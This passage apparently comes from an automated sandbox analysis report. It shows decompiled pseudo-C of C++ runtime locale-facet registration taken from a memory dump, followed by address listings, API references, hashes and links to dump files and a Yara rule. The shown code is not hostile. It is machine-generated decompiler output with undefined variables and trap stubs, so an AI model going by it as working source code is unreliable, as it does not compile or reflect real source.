																																					 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																					 *(_t770 - 0x10) = _t746;
																																					_t394 = E6D451D10();
																																					_t624 =  *((intOrPtr*)(_t770 + 8));
																																					_t728 = E6D452140( *((intOrPtr*)(_t770 + 8)), _t394);
																																					__eflags = _t728;
																																					if(_t728 != 0) {
																																						L82:
																																						E6D476A77(_t770 - 0x14);
																																						return E6D490E67(_t728);
																																					} else {
																																						__eflags = _t746;
																																						if(__eflags == 0) {
																																							_push( *((intOrPtr*)(_t770 + 8)));
																																							_push(_t770 - 0x10);
																																							__eflags = E6D4828A7(_t544, _t624, _t715, _t728, _t746, __eflags, _t774) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6D451940();
																																								E6D4924F4(_t770 - 0x20, 0x6d5329cc);
																																								asm("int3");
																																								_push(0x14);
																																								E6D490E9E(0x6d4fe9a2, _t544, _t728, _t746);
																																								E6D476A10(_t770 - 0x14, 0);
																																								_t747 =  *0x6d53fdf4; // 0x0
																																								 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																								 *(_t770 - 0x10) = _t747;
																																								_t407 = E6D451D10();
																																								_t631 =  *((intOrPtr*)(_t770 + 8));
																																								_t729 = E6D452140( *((intOrPtr*)(_t770 + 8)), _t407);
																																								__eflags = _t729;
																																								if(_t729 != 0) {
																																									L89:
																																									E6D476A77(_t770 - 0x14);
																																									return E6D490E67(_t729);
																																								} else {
																																									__eflags = _t747;
																																									if(__eflags == 0) {
																																										_push( *((intOrPtr*)(_t770 + 8)));
																																										_push(_t770 - 0x10);
																																										__eflags = E6D48290F(_t544, _t631, _t715, _t729, _t747, __eflags, _t774) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6D451940();
																																											E6D4924F4(_t770 - 0x20, 0x6d5329cc);
																																											asm("int3");
																																											_push(0x14);
																																											E6D490E9E(0x6d4fe9a2, _t544, _t729, _t747);
																																											E6D476A10(_t770 - 0x14, 0);
																																											_t748 =  *0x6d53fe10; // 0x0
																																											 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																											 *(_t770 - 0x10) = _t748;
																																											_t420 = E6D451D10();
																																											_t638 =  *((intOrPtr*)(_t770 + 8));
																																											_t730 = E6D452140( *((intOrPtr*)(_t770 + 8)), _t420);
																																											__eflags = _t730;
																																											if(_t730 != 0) {
																																												L96:
																																												E6D476A77(_t770 - 0x14);
																																												return E6D490E67(_t730);
																																											} else {
																																												__eflags = _t748;
																																												if(__eflags == 0) {
																																													_push( *((intOrPtr*)(_t770 + 8)));
																																													_push(_t770 - 0x10);
																																													__eflags = E6D48298A(_t544, _t638, _t715, _t730, _t748, __eflags, _t774) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6D451940();
																																														E6D4924F4(_t770 - 0x20, 0x6d5329cc);
																																														asm("int3");
																																														_push(0x14);
																																														E6D490E9E(0x6d4fe9a2, _t544, _t730, _t748);
																																														E6D476A10(_t770 - 0x14, 0);
																																														_t749 =  *0x6d53fde0; // 0x0
																																														 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																														 *(_t770 - 0x10) = _t749;
																																														_t433 = E6D451D10();
																																														_t645 =  *((intOrPtr*)(_t770 + 8));
																																														_t731 = E6D452140( *((intOrPtr*)(_t770 + 8)), _t433);
																																														__eflags = _t731;
																																														if(_t731 != 0) {
																																															L103:
																																															E6D476A77(_t770 - 0x14);
																																															return E6D490E67(_t731);
																																														} else {
																																															__eflags = _t749;
																																															if(__eflags == 0) {
																																																_push( *((intOrPtr*)(_t770 + 8)));
																																																_push(_t770 - 0x10);
																																																__eflags = E6D4829F6(_t544, _t645, _t715, _t731, _t749, __eflags, _t774) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6D451940();
																																																	E6D4924F4(_t770 - 0x20, 0x6d5329cc);
																																																	asm("int3");
																																																	_push(0x14);
																																																	E6D490E9E(0x6d4fe9a2, _t544, _t731, _t749);
																																																	E6D476A10(_t770 - 0x14, 0);
																																																	_t750 =  *0x6d53fe14; // 0x0
																																																	 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																																	 *(_t770 - 0x10) = _t750;
																																																	_t446 = E6D451D10();
																																																	_t652 =  *((intOrPtr*)(_t770 + 8));
																																																	_t732 = E6D452140( *((intOrPtr*)(_t770 + 8)), _t446);
																																																	__eflags = _t732;
																																																	if(_t732 != 0) {
																																																		L110:
																																																		E6D476A77(_t770 - 0x14);
																																																		return E6D490E67(_t732);
																																																	} else {
																																																		__eflags = _t750;
																																																		if(__eflags == 0) {
																																																			_push( *((intOrPtr*)(_t770 + 8)));
																																																			_push(_t770 - 0x10);
																																																			__eflags = E6D482A62(_t544, _t652, _t715, _t732, _t750, __eflags, _t774) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				E6D451940();
																																																				E6D4924F4(_t770 - 0x20, 0x6d5329cc);
																																																				asm("int3");
																																																				_push(0x14);
																																																				E6D490E9E(0x6d4fe9a2, _t544, _t732, _t750);
																																																				E6D476A10(_t770 - 0x14, 0);
																																																				_t751 =  *0x6d53fde4; // 0x0
																																																				 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																																				 *(_t770 - 0x10) = _t751;
																																																				_t459 = E6D451D10();
																																																				_t659 =  *((intOrPtr*)(_t770 + 8));
																																																				_t733 = E6D452140( *((intOrPtr*)(_t770 + 8)), _t459);
																																																				__eflags = _t733;
																																																				if(_t733 != 0) {
																																																					L117:
																																																					E6D476A77(_t770 - 0x14);
																																																					return E6D490E67(_t733);
																																																				} else {
																																																					__eflags = _t751;
																																																					if(__eflags == 0) {
																																																						_push( *((intOrPtr*)(_t770 + 8)));
																																																						_push(_t770 - 0x10);
																																																						__eflags = E6D482AC8(_t544, _t659, _t715, _t733, _t751, __eflags, _t774) - 0xffffffff;
																																																						if(__eflags == 0) {
																																																							_t663 = _t770 - 0x20;
																																																							E6D451940();
																																																							E6D4924F4(_t770 - 0x20, 0x6d5329cc);
																																																							asm("int3");
																																																							_push(4);
																																																							E6D490E9E(0x6d4fefbc, _t544, _t733, _t751);
																																																							_t752 = _t663;
																																																							 *(_t770 - 0x10) = _t752;
																																																							 *((intOrPtr*)(_t752 + 4)) =  *((intOrPtr*)(_t770 + 0xc));
																																																							_push( *((intOrPtr*)(_t770 + 0x14)));
																																																							_push( *((intOrPtr*)(_t770 + 8)));
																																																							_t245 = _t770 - 4;
																																																							 *_t245 =  *(_t770 - 4) & 0x00000000;
																																																							__eflags =  *_t245;
																																																							 *_t752 = 0x6d5041ac;
																																																							 *((char*)(_t752 + 0x28)) =  *((intOrPtr*)(_t770 + 0x10));
																																																							E6D4868B7(_t544, _t663, _t715, _t733, _t752,  *_t245, _t774);
																																																							return E6D490E67(_t752);
																																																						} else {
																																																							_t733 =  *(_t770 - 0x10);
																																																							 *(_t770 - 0x10) = _t733;
																																																							 *(_t770 - 4) = 1;
																																																							E6D478A0B(__eflags, _t733);
																																																							 *0x6d5001e8();
																																																							 *((intOrPtr*)( *((intOrPtr*)( *_t733 + 4))))();
																																																							 *0x6d53fde4 = _t733;
																																																							goto L117;
																																																						}
																																																					} else {
																																																						_t733 = _t751;
																																																						goto L117;
																																																					}
																																																				}
																																																			} else {
																																																				_t732 =  *(_t770 - 0x10);
																																																				 *(_t770 - 0x10) = _t732;
																																																				 *(_t770 - 4) = 1;
																																																				E6D478A0B(__eflags, _t732);
																																																				 *0x6d5001e8();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t732 + 4))))();
																																																				 *0x6d53fe14 = _t732;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t732 = _t750;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t731 =  *(_t770 - 0x10);
																																																	 *(_t770 - 0x10) = _t731;
																																																	 *(_t770 - 4) = 1;
																																																	E6D478A0B(__eflags, _t731);
																																																	 *0x6d5001e8();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t731 + 4))))();
																																																	 *0x6d53fde0 = _t731;
																																																	goto L103;
																																																}
																																															} else {
																																																_t731 = _t749;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t730 =  *(_t770 - 0x10);
																																														 *(_t770 - 0x10) = _t730;
																																														 *(_t770 - 4) = 1;
																																														E6D478A0B(__eflags, _t730);
																																														 *0x6d5001e8();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t730 + 4))))();
																																														 *0x6d53fe10 = _t730;
																																														goto L96;
																																													}
																																												} else {
																																													_t730 = _t748;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t729 =  *(_t770 - 0x10);
																																											 *(_t770 - 0x10) = _t729;
																																											 *(_t770 - 4) = 1;
																																											E6D478A0B(__eflags, _t729);
																																											 *0x6d5001e8();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t729 + 4))))();
																																											 *0x6d53fdf4 = _t729;
																																											goto L89;
																																										}
																																									} else {
																																										_t729 = _t747;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t728 =  *(_t770 - 0x10);
																																								 *(_t770 - 0x10) = _t728;
																																								 *(_t770 - 4) = 1;
																																								E6D478A0B(__eflags, _t728);
																																								 *0x6d5001e8();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t728 + 4))))();
																																								 *0x6d53fdf0 = _t728;
																																								goto L82;
																																							}
																																						} else {
																																							_t728 = _t746;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t727 =  *(_t770 - 0x10);
																																					 *(_t770 - 0x10) = _t727;
																																					 *(_t770 - 4) = 1;
																																					E6D478A0B(__eflags, _t727);
																																					 *0x6d5001e8();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t727 + 4))))();
																																					 *0x6d53fdc4 = _t727;
																																					goto L75;
																																				}
																																			} else {
																																				_t727 = _t745;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t726 =  *(_t770 - 0x10);
																																		 *(_t770 - 0x10) = _t726;
																																		 *(_t770 - 4) = 1;
																																		E6D478A0B(__eflags, _t726);
																																		 *0x6d5001e8();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t726 + 4))))();
																																		 *0x6d53fdec = _t726;
																																		goto L68;
																																	}
																																} else {
																																	_t726 = _t744;
																																	goto L68;
																																}
																															}
																														} else {
																															_t725 =  *(_t770 - 0x10);
																															 *(_t770 - 0x10) = _t725;
																															 *(_t770 - 4) = 1;
																															E6D478A0B(__eflags, _t725);
																															 *0x6d5001e8();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t725 + 4))))();
																															 *0x6d53fdd8 = _t725;
																															goto L61;
																														}
																													} else {
																														_t725 = _t743;
																														goto L61;
																													}
																												}
																											} else {
																												_t724 =  *(_t770 - 0x10);
																												 *(_t770 - 0x10) = _t724;
																												 *(_t770 - 4) = 1;
																												E6D478A0B(__eflags, _t724);
																												 *0x6d5001e8();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t724 + 4))))();
																												 *0x6d53fddc = _t724;
																												goto L54;
																											}
																										} else {
																											_t724 = _t742;
																											goto L54;
																										}
																									}
																								} else {
																									_t723 =  *(_t770 - 0x10);
																									 *(_t770 - 0x10) = _t723;
																									 *(_t770 - 4) = 1;
																									E6D478A0B(__eflags, _t723);
																									 *0x6d5001e8();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t723 + 4))))();
																									 *0x6d53fe08 = _t723;
																									goto L47;
																								}
																							} else {
																								_t723 = _t741;
																								goto L47;
																							}
																						}
																					} else {
																						_t722 =  *(_t770 - 0x10);
																						 *(_t770 - 0x10) = _t722;
																						 *(_t770 - 4) = 1;
																						E6D478A0B(__eflags, _t722);
																						 *0x6d5001e8();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t722 + 4))))();
																						 *0x6d53fe0c = _t722;
																						goto L40;
																					}
																				} else {
																					_t722 = _t740;
																					goto L40;
																				}
																			}
																		} else {
																			_t721 =  *(_t770 - 0x10);
																			 *(_t770 - 0x10) = _t721;
																			 *(_t770 - 4) = 1;
																			E6D478A0B(__eflags, _t721);
																			 *0x6d5001e8();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t721 + 4))))();
																			 *0x6d53fdd4 = _t721;
																			goto L33;
																		}
																	} else {
																		_t721 = _t739;
																		goto L33;
																	}
																}
															} else {
																_t720 =  *(_t770 - 0x10);
																 *(_t770 - 0x10) = _t720;
																 *(_t770 - 4) = 1;
																E6D478A0B(__eflags, _t720);
																 *0x6d5001e8();
																 *((intOrPtr*)( *((intOrPtr*)( *_t720 + 4))))();
																 *0x6d53fe04 = _t720;
																goto L26;
															}
														} else {
															_t720 = _t738;
															goto L26;
														}
													}
												} else {
													_t719 =  *(_t770 - 0x10);
													 *(_t770 - 0x10) = _t719;
													 *(_t770 - 4) = 1;
													E6D478A0B(__eflags, _t719);
													 *0x6d5001e8();
													 *((intOrPtr*)( *((intOrPtr*)( *_t719 + 4))))();
													 *0x6d53fdd0 = _t719;
													goto L19;
												}
											} else {
												_t719 = _t737;
												goto L19;
											}
										}
									} else {
										_t718 =  *(_t770 - 0x10);
										 *(_t770 - 0x10) = _t718;
										 *(_t770 - 4) = 1;
										E6D478A0B(__eflags, _t718);
										 *0x6d5001e8();
										 *((intOrPtr*)( *((intOrPtr*)( *_t718 + 4))))();
										 *0x6d53fe00 = _t718;
										goto L12;
									}
								} else {
									_t718 = _t736;
									goto L12;
								}
							}
						} else {
							_t717 =  *(_t770 - 0x10);
							 *(_t770 - 0x10) = _t717;
							 *(_t770 - 4) = 1;
							E6D478A0B(__eflags, _t717);
							 *0x6d5001e8();
							 *((intOrPtr*)( *((intOrPtr*)( *_t717 + 4))))();
							 *0x6d53fdcc = _t717;
							goto L5;
						}
					} else {
						_t717 = _t735;
						goto L5;
					}
				}
			}

0x6d4806b8
0x6d4806b8
0x6d4806b8
0x6d4806bf
0x6d4806c9
0x6d4806ce
0x6d4806d9
0x6d4806dd
0x6d4806e0
0x6d4806e5
0x6d4806e9
0x6d4806ee
0x6d4806f2
0x6d480737
0x6d48073a
0x6d480746
0x6d4806f4
0x6d4806f6
0x6d4806fc
0x6d480702
0x6d48070a
0x6d48070d
0x6d48074a
0x6d480758
0x6d48075d
0x6d48075e
0x6d480765
0x6d48076f
0x6d480774
0x6d48077f
0x6d480783
0x6d480786
0x6d48078b
0x6d480794
0x6d480796
0x6d480798
0x6d4807dd
0x6d4807e0
0x6d4807ec
0x6d48079a
0x6d48079a
0x6d48079c
0x6d4807a2
0x6d4807a8
0x6d4807b0
0x6d4807b3
0x6d4807f0
0x6d4807fe
0x6d480803
0x6d480804
0x6d48080b
0x6d480815
0x6d48081a
0x6d480825
0x6d480829
0x6d48082c
0x6d480831
0x6d48083a
0x6d48083c
0x6d48083e
0x6d480883
0x6d480886
0x6d480892
0x6d480840
0x6d480840
0x6d480842
0x6d480848
0x6d48084e
0x6d480856
0x6d480859
0x6d480896
0x6d4808a4
0x6d4808a9
0x6d4808aa
0x6d4808b1
0x6d4808bb
0x6d4808c0
0x6d4808cb
0x6d4808cf
0x6d4808d2
0x6d4808d7
0x6d4808e0
0x6d4808e2
0x6d4808e4
0x6d480929
0x6d48092c
0x6d480938
0x6d4808e6
0x6d4808e6
0x6d4808e8
0x6d4808ee
0x6d4808f4
0x6d4808fc
0x6d4808ff
0x6d48093c
0x6d48094a
0x6d48094f
0x6d480950
0x6d480957
0x6d480961
0x6d480966
0x6d480971
0x6d480975
0x6d480978
0x6d48097d
0x6d480986
0x6d480988
0x6d48098a
0x6d4809cf
0x6d4809d2
0x6d4809de
0x6d48098c
0x6d48098c
0x6d48098e
0x6d480994
0x6d48099a
0x6d4809a2
0x6d4809a5
0x6d4809e2
0x6d4809f0
0x6d4809f5
0x6d4809f6
0x6d4809fd
0x6d480a07
0x6d480a0c
0x6d480a17
0x6d480a1b
0x6d480a1e
0x6d480a23
0x6d480a2c
0x6d480a2e
0x6d480a30
0x6d480a75
0x6d480a78
0x6d480a84
0x6d480a32
0x6d480a32
0x6d480a34
0x6d480a3a
0x6d480a40
0x6d480a48
0x6d480a4b
0x6d480a88
0x6d480a96
0x6d480a9b
0x6d480a9c
0x6d480aa3
0x6d480aad
0x6d480ab2
0x6d480abd
0x6d480ac1
0x6d480ac4
0x6d480ac9
0x6d480ad2
0x6d480ad4
0x6d480ad6
0x6d480b1b
0x6d480b1e
0x6d480b2a
0x6d480ad8
0x6d480ad8
0x6d480ada
0x6d480ae0
0x6d480ae6
0x6d480aee
0x6d480af1
0x6d480b2e
0x6d480b3c
0x6d480b41
0x6d480b42
0x6d480b49
0x6d480b53
0x6d480b58
0x6d480b63
0x6d480b67
0x6d480b6a
0x6d480b6f
0x6d480b78
0x6d480b7a
0x6d480b7c
0x6d480bc1
0x6d480bc4
0x6d480bd0
0x6d480b7e
0x6d480b7e
0x6d480b80
0x6d480b86
0x6d480b8c
0x6d480b94
0x6d480b97
0x6d480bd4
0x6d480be2
0x6d480be7
0x6d480be8
0x6d480bef
0x6d480bf9
0x6d480bfe
0x6d480c09
0x6d480c0d
0x6d480c10
0x6d480c15
0x6d480c1e
0x6d480c20
0x6d480c22
0x6d480c67
0x6d480c6a
0x6d480c76
0x6d480c24
0x6d480c24
0x6d480c26
0x6d480c2c
0x6d480c32
0x6d480c3a
0x6d480c3d
0x6d480c7a
0x6d480c88
0x6d480c8d
0x6d480c8e
0x6d480c95
0x6d480c9f
0x6d480ca4
0x6d480caf
0x6d480cb3
0x6d480cb6
0x6d480cbb
0x6d480cc4
0x6d480cc6
0x6d480cc8
0x6d480d0d
0x6d480d10
0x6d480d1c
0x6d480cca
0x6d480cca
0x6d480ccc
0x6d480cd2
0x6d480cd8
0x6d480ce0
0x6d480ce3
0x6d480d20
0x6d480d2e
0x6d480d33
0x6d480d34
0x6d480d3b
0x6d480d45
0x6d480d4a
0x6d480d55
0x6d480d59
0x6d480d5c
0x6d480d61
0x6d480d6a
0x6d480d6c
0x6d480d6e
0x6d480db3
0x6d480db6
0x6d480dc2
0x6d480d70
0x6d480d70
0x6d480d72
0x6d480d78
0x6d480d7e
0x6d480d86
0x6d480d89
0x6d480dc6
0x6d480dd4
0x6d480dd9
0x6d480dda
0x6d480de1
0x6d480deb
0x6d480df0
0x6d480dfb
0x6d480dff
0x6d480e02
0x6d480e07
0x6d480e10
0x6d480e12
0x6d480e14
0x6d480e59
0x6d480e5c
0x6d480e68
0x6d480e16
0x6d480e16
0x6d480e18
0x6d480e1e
0x6d480e24
0x6d480e2c
0x6d480e2f
0x6d480e6c
0x6d480e7a
0x6d480e7f
0x6d480e80
0x6d480e87
0x6d480e91
0x6d480e96
0x6d480ea1
0x6d480ea5
0x6d480ea8
0x6d480ead
0x6d480eb6
0x6d480eb8
0x6d480eba
0x6d480eff
0x6d480f02
0x6d480f0e
0x6d480ebc
0x6d480ebc
0x6d480ebe
0x6d480ec4
0x6d480eca
0x6d480ed2
0x6d480ed5
0x6d480f12
0x6d480f20
0x6d480f25
0x6d480f26
0x6d480f2d
0x6d480f37
0x6d480f3c
0x6d480f47
0x6d480f4b
0x6d480f4e
0x6d480f53
0x6d480f5c
0x6d480f5e
0x6d480f60
0x6d480fa5
0x6d480fa8
0x6d480fb4
0x6d480f62
0x6d480f62
0x6d480f64
0x6d480f6a
0x6d480f70
0x6d480f78
0x6d480f7b
0x6d480fb8
0x6d480fc6
0x6d480fcb
0x6d480fcc
0x6d480fd3
0x6d480fdd
0x6d480fe2
0x6d480fed
0x6d480ff1
0x6d480ff4
0x6d480ff9
0x6d481002
0x6d481004
0x6d481006
0x6d48104b
0x6d48104e
0x6d48105a
0x6d481008
0x6d481008
0x6d48100a
0x6d481010
0x6d481016
0x6d48101e
0x6d481021
0x6d48105e
0x6d48106c
0x6d481071
0x6d481072
0x6d481079
0x6d481083
0x6d481088
0x6d481093
0x6d481097
0x6d48109a
0x6d48109f
0x6d4810a8
0x6d4810aa
0x6d4810ac
0x6d4810f1
0x6d4810f4
0x6d481100
0x6d4810ae
0x6d4810ae
0x6d4810b0
0x6d4810b6
0x6d4810bc
0x6d4810c4
0x6d4810c7
0x6d481104
0x6d481112
0x6d481117
0x6d481118
0x6d48111f
0x6d481129
0x6d48112e
0x6d481139
0x6d48113d
0x6d481140
0x6d481145
0x6d48114e
0x6d481150
0x6d481152
0x6d481197
0x6d48119a
0x6d4811a6
0x6d481154
0x6d481154
0x6d481156
0x6d48115c
0x6d481162
0x6d48116a
0x6d48116d
0x6d4811a7
0x6d4811aa
0x6d4811b8
0x6d4811bd
0x6d4811be
0x6d4811c5
0x6d4811ca
0x6d4811cc
0x6d4811d2
0x6d4811d5
0x6d4811db
0x6d4811de
0x6d4811de
0x6d4811de
0x6d4811e2
0x6d4811e8
0x6d4811eb
0x6d4811f7
0x6d48116f
0x6d48116f
0x6d481172
0x6d481176
0x6d48117a
0x6d481187
0x6d48118f
0x6d481191
0x00000000
0x6d481191
0x6d481158
0x6d481158
0x00000000
0x6d481158
0x6d481156
0x6d4810c9
0x6d4810c9
0x6d4810cc
0x6d4810d0
0x6d4810d4
0x6d4810e1
0x6d4810e9
0x6d4810eb
0x00000000
0x6d4810eb
0x6d4810b2
0x6d4810b2
0x00000000
0x6d4810b2
0x6d4810b0
0x6d481023
0x6d481023
0x6d481026
0x6d48102a
0x6d48102e
0x6d48103b
0x6d481043
0x6d481045
0x00000000
0x6d481045
0x6d48100c
0x6d48100c
0x00000000
0x6d48100c
0x6d48100a
0x6d480f7d
0x6d480f7d
0x6d480f80
0x6d480f84
0x6d480f88
0x6d480f95
0x6d480f9d
0x6d480f9f
0x00000000
0x6d480f9f
0x6d480f66
0x6d480f66
0x00000000
0x6d480f66
0x6d480f64
0x6d480ed7
0x6d480ed7
0x6d480eda
0x6d480ede
0x6d480ee2
0x6d480eef
0x6d480ef7
0x6d480ef9
0x00000000
0x6d480ef9
0x6d480ec0
0x6d480ec0
0x00000000
0x6d480ec0
0x6d480ebe
0x6d480e31
0x6d480e31
0x6d480e34
0x6d480e38
0x6d480e3c
0x6d480e49
0x6d480e51
0x6d480e53
0x00000000
0x6d480e53
0x6d480e1a
0x6d480e1a
0x00000000
0x6d480e1a
0x6d480e18
0x6d480d8b
0x6d480d8b
0x6d480d8e
0x6d480d92
0x6d480d96
0x6d480da3
0x6d480dab
0x6d480dad
0x00000000
0x6d480dad
0x6d480d74
0x6d480d74
0x00000000
0x6d480d74
0x6d480d72
0x6d480ce5
0x6d480ce5
0x6d480ce8
0x6d480cec
0x6d480cf0
0x6d480cfd
0x6d480d05
0x6d480d07
0x00000000
0x6d480d07
0x6d480cce
0x6d480cce
0x00000000
0x6d480cce
0x6d480ccc
0x6d480c3f
0x6d480c3f
0x6d480c42
0x6d480c46
0x6d480c4a
0x6d480c57
0x6d480c5f
0x6d480c61
0x00000000
0x6d480c61
0x6d480c28
0x6d480c28
0x00000000
0x6d480c28
0x6d480c26
0x6d480b99
0x6d480b99
0x6d480b9c
0x6d480ba0
0x6d480ba4
0x6d480bb1
0x6d480bb9
0x6d480bbb
0x00000000
0x6d480bbb
0x6d480b82
0x6d480b82
0x00000000
0x6d480b82
0x6d480b80
0x6d480af3
0x6d480af3
0x6d480af6
0x6d480afa
0x6d480afe
0x6d480b0b
0x6d480b13
0x6d480b15
0x00000000
0x6d480b15
0x6d480adc
0x6d480adc
0x00000000
0x6d480adc
0x6d480ada
0x6d480a4d
0x6d480a4d
0x6d480a50
0x6d480a54
0x6d480a58
0x6d480a65
0x6d480a6d
0x6d480a6f
0x00000000
0x6d480a6f
0x6d480a36
0x6d480a36
0x00000000
0x6d480a36
0x6d480a34
0x6d4809a7
0x6d4809a7
0x6d4809aa
0x6d4809ae
0x6d4809b2
0x6d4809bf
0x6d4809c7
0x6d4809c9
0x00000000
0x6d4809c9
0x6d480990
0x6d480990
0x00000000
0x6d480990
0x6d48098e
0x6d480901
0x6d480901
0x6d480904
0x6d480908
0x6d48090c
0x6d480919
0x6d480921
0x6d480923
0x00000000
0x6d480923
0x6d4808ea
0x6d4808ea
0x00000000
0x6d4808ea
0x6d4808e8
0x6d48085b
0x6d48085b
0x6d48085e
0x6d480862
0x6d480866
0x6d480873
0x6d48087b
0x6d48087d
0x00000000
0x6d48087d
0x6d480844
0x6d480844
0x00000000
0x6d480844
0x6d480842
0x6d4807b5
0x6d4807b5
0x6d4807b8
0x6d4807bc
0x6d4807c0
0x6d4807cd
0x6d4807d5
0x6d4807d7
0x00000000
0x6d4807d7
0x6d48079e
0x6d48079e
0x00000000
0x6d48079e
0x6d48079c
0x6d48070f
0x6d48070f
0x6d480712
0x6d480716
0x6d48071a
0x6d480727
0x6d48072f
0x6d480731
0x00000000
0x6d480731
0x6d4806f8
0x6d4806f8
0x00000000
0x6d4806f8
0x6d4806f6

APIs

__EH_prolog3.LIBCMT ref: 6D4806BF
std::_Lockit::_Lockit.LIBCPMT ref: 6D4806C9

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

messages.LIBCPMT ref: 6D480703
std::_Facet_Register.LIBCPMT ref: 6D48071A
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48073A
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480758

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmessages
String ID:
API String ID: 438560357-0
Opcode ID: 212f63afdc559a27136fbc3d321536252d74ece3e1a2dfff44d8aad5d07f967f
Instruction ID: 36659fa113f989637416a9e81e08acb4ad8f06632a8f18e2a956507b894c6d8f
Opcode Fuzzy Hash: 212f63afdc559a27136fbc3d321536252d74ece3e1a2dfff44d8aad5d07f967f
Instruction Fuzzy Hash: CB119A329042698BCF15DBA5C884EEE7775AF84768F26041ED611AB290DF34DE01CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48037A, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E6D48037A(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* _t321;
				signed int _t322;
				void* _t334;
				void* _t347;
				void* _t360;
				void* _t373;
				void* _t386;
				void* _t399;
				void* _t412;
				void* _t425;
				void* _t438;
				void* _t451;
				void* _t464;
				void* _t477;
				void* _t490;
				void* _t503;
				void* _t516;
				void* _t529;
				void* _t542;
				void* _t555;
				void* _t568;
				void* _t581;
				void* _t594;
				signed int _t853;
				signed int _t923;
				signed int _t924;
				signed int _t925;
				signed int _t926;
				signed int _t927;
				signed int _t928;
				signed int _t929;
				signed int _t930;
				signed int _t931;
				signed int _t932;
				signed int _t933;
				signed int _t934;
				signed int _t935;
				signed int _t936;
				signed int _t937;
				signed int _t938;
				signed int _t939;
				signed int _t940;
				signed int _t941;
				signed int _t942;
				signed int _t943;
				signed int _t945;
				signed int _t946;
				signed int _t947;
				signed int _t948;
				signed int _t949;
				signed int _t950;
				signed int _t951;
				signed int _t952;
				signed int _t953;
				signed int _t954;
				signed int _t955;
				signed int _t956;
				signed int _t957;
				signed int _t958;
				signed int _t959;
				signed int _t960;
				signed int _t961;
				signed int _t962;
				signed int _t963;
				signed int _t964;
				signed int _t965;
				signed int _t966;
				signed int _t967;
				void* _t990;

				_t994 = __fp0;
				_t920 = __edx;
				_t699 = __ebx;
				_push(0x14);
				E6D490E9E(0x6d4fe9a2, __ebx, __edi, __esi);
				E6D476A10(_t990 - 0x14, 0);
				_t945 =  *0x6d53fe18; // 0x0
				 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
				 *(_t990 - 0x10) = _t945;
				_t321 = E6D451D10();
				_t702 =  *((intOrPtr*)(_t990 + 8));
				_t322 = E6D452140( *((intOrPtr*)(_t990 + 8)), _t321);
				_t922 = _t322;
				if(_t322 != 0) {
					L5:
					E6D476A77(_t990 - 0x14);
					return E6D490E67(_t922);
				} else {
					if(_t945 == 0) {
						_push( *((intOrPtr*)(_t990 + 8)));
						_push(_t990 - 0x10);
						__eflags = E6D48213B(__ebx, _t702, __edx, _t922, _t945, __eflags, __fp0) - 0xffffffff;
						if(__eflags == 0) {
							E6D451940();
							E6D4924F4(_t990 - 0x20, 0x6d5329cc);
							asm("int3");
							_push(0x14);
							E6D490E9E(0x6d4fe9a2, __ebx, _t922, _t945);
							E6D476A10(_t990 - 0x14, 0);
							_t946 =  *0x6d53fdf8; // 0x0
							 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
							 *(_t990 - 0x10) = _t946;
							_t334 = E6D451D10();
							_t709 =  *((intOrPtr*)(_t990 + 8));
							_t923 = E6D452140( *((intOrPtr*)(_t990 + 8)), _t334);
							__eflags = _t923;
							if(_t923 != 0) {
								L12:
								E6D476A77(_t990 - 0x14);
								return E6D490E67(_t923);
							} else {
								__eflags = _t946;
								if(__eflags == 0) {
									_push( *((intOrPtr*)(_t990 + 8)));
									_push(_t990 - 0x10);
									__eflags = E6D4821A1(_t699, _t709, __edx, _t923, _t946, __eflags, __fp0) - 0xffffffff;
									if(__eflags == 0) {
										E6D451940();
